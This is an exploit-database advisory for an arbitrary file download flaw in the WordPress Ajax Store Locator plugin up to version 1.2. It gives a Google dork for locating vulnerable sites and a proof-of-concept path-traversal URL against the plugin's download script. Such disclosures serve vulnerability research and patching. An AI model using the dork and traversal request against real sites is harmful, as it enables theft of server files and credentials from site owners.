WordPress Ajax Store Locator 1.2 Arbitrary File Download

2014.12.09

Credit: Claudio Viviani

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-200

Dork: inurl:ajax-store-locator

######################
# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
# Software Link : Premium
# Dork Google: inurl:ajax-store-locator
# index of ajax-store-locator
# Date : 2014-12-06
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../nomefile]
"download_file" variable is not sanitized.
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################

References:

http://codecanyon.net/item/ajax-store-locator-wordpress/5293356

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Ajax Store Locator 1.2 Arbitrary File Download

Dork: inurl:ajax-store-locator

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.